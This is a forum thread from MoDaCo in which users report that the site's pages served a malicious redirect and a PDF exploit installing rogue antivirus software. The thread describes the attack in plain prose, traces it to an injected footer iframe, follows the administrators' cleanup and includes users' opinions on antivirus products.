• Announcements

    • Reminder - MoDaCo position on illegal content   07/30/15

      ILLEGAL CONTENT I'd like to just reaffirm MoDaCo's position regarding piracy and illegal content in the light of some recent questions / postings. Posts will be censored by myself or my moderation team if the contain or link to: Illegal / pirated / cracked software or sites that host such softwareNintendo emulators / ROMs or sites hosting them (in light of Nintendo's legal stance)CUSTOM ROMS You may discuss and post links to custom device ROMs on MoDaCo, provided the following rules are adhered to: ROMs must not contain any illegal 3rd party software (this includes trial versions included without permission)ROMs must give full credit to the original authorISSUES If you have any issues with this policy, please contact PaulOBrien directly via PM.
    • Reminder: Selling items on the forum directly is not allowed   07/30/15

      Please note that selling items on the forum directly is not allowed by the forum rules. There is a forum for eBay auctions whereby you can list the items on eBay and link to them there. This is the ONLY forum for this type of activity. You may also advertise links to the eBay forum in your signature. Please note that selling directly in contravention of these rules will result in a warning / suspension / ban.

Adware / spyware in modaco adds?

13 posts in this topic

Posted · Report post

See screendump. Wasn't log'd in at the time. Syntax struck me as odd. Upon clicking 'no' it tried downloading anyway but my firewall stopped it....

IE6, fully patched, doing a full scan just in case :-(

Nowhere's safe on the t'interweb eh?

M.S

post-254928-1235255379_thumb.jpg

0

Share this post


Link to post
Share on other sites

Posted · Report post

More info:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

This adds an element to the current page containing a pdf object. The pdf file that is loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it will download and execute the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rouge antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the users must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.

0

Share this post


Link to post
Share on other sites

Posted (edited) · Report post

Yea my AVG is going nuts each time I visit the forum. It is saying "Exploit Link to known exploit site (type 502)" each time I view any MoDaCo page.... is this a false positive or is there something here?

EDIT:

Just saw your second post. I did notice it asked me download a PDF! Luckily I use FoxIt not Adobe Reader so hopefully I'm ok.

Gonna do a MalwareBytes scan just in case.

Thanks!

Edited by TheDrizzle
0

Share this post


Link to post
Share on other sites

Posted · Report post

Investigating...

P

0

Share this post


Link to post
Share on other sites

Posted · Report post

Should be gone now, continuing diagnosis...

P

0

Share this post


Link to post
Share on other sites

Posted · Report post

On the lappy Kaspersky found it as soon as I clicked on the site :(

Windows Onecare did not even flinch and let the little beatie screw up my main PC.

0

Share this post


Link to post
Share on other sites

Posted · Report post

Windows Onecare did not even flinch and let the little beatie screw up my main PC.

Should only be an issue if you allow the re-direct and file install by clicking on it, although *any* action in the dialogue box ( even clicking 'no') prompts for the download. I'd suggest you reset your browser security settings to default? My laptop has a corporate norton on there but I use onecare on other machine and it's usually very good.

M.S

0

Share this post


Link to post
Share on other sites

Posted · Report post

Did not get that far, the whole hard drive went in to overtime and the pc went as fast as an Orange ROM :(

Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.

I've found Onecare to be good in the past but then again after this just how good has it really been?

Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get though until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...

0

Share this post


Link to post
Share on other sites

Posted · Report post

Did not get that far, the whole hard drive went in to overtime and the pc went as fast as an Orange ROM :(

Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.

I've found Onecare to be good in the past but then again after this just how good has it really been?

Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get though until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...

Check the pop up blocker settings in firefox.

http://support.mozilla.com/en-US/kb/Pop-up+blocker

There are options to handle different file types differently. As this exploit uses a .pdf file it may be you have settings that allow downloads of pdfs ( which are usually safe and inert....)

Also from older posts on t'interweb (June 08) firefox automatically downloads stuff into a cache:

http://alanedwardes.com/posts/firefox-auto...-security-flaw/

"WTF? So does Firefox download stuff for you now? So it turns out it does. When I looked in the OneCare quarantine it displayed the path that the virus was found in. So, I was a bit worried when it turned out that the file was found in the Firefox cache folder. Interesting."

Which version firefox is it? There are/were multiple mutterings about incompatability with onecare for older versions. As onecare has now been discontinued (as some aspects are going to be incorporated in future free offerings from M$) I wouldn't expect too much development with the latest version of firefox etc. Shame as some of the advanced functions with onecare are very good.

I've always given Kaspersky a bit of a wide berth based on F-secure using their engine and being so poor at doing pretty much anything. Everyone has their own favourite and there will be fans and haters of every solution. Norton's 2009 suite has been re-written to improve system performance and is supposedly quite good now.

Kaspersky also uninstalls the very good, free, spybot s&d for no real reason...

http://forum.kaspersky.com/index.php?showt...mp;#entry768506

M.S

0

Share this post


Link to post
Share on other sites

Posted · Report post

Should be gone now, continuing diagnosis...

P

Still doing it - look at the URL it's trying to open, same as the last one, crashed my browser window this time though. :(

More diagnosis needed methinks?

M.S

post-254928-1235325872_thumb.jpg

0

Share this post


Link to post
Share on other sites

Posted · Report post

OK, looks like the owner of caribfinancing has found out about their security issue and is now redirecting calls to that page to google....which means due to the iframe remaining on every page footer every modaco page is being redirected to google! (unless you hit stop in time...).

Virus issue appears to have been resolved but obviously the site just needs tweaking back, watch this space...

0

Share this post


Link to post
Share on other sites

Posted · Report post

Should be all sorted now, nasty hackers... :(

P

0

Share this post


Link to post
Share on other sites

Posted · Report post

hi there i have this same problem on my site, ive deleted it many times from skins but it keeps coming back, please can you tell me how to get rid of it altogether

many thanks

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

MoDaCo is part of the MoDaCo.network, © Paul O'Brien 2002-2015. MoDaCo uses IntelliTxt technology.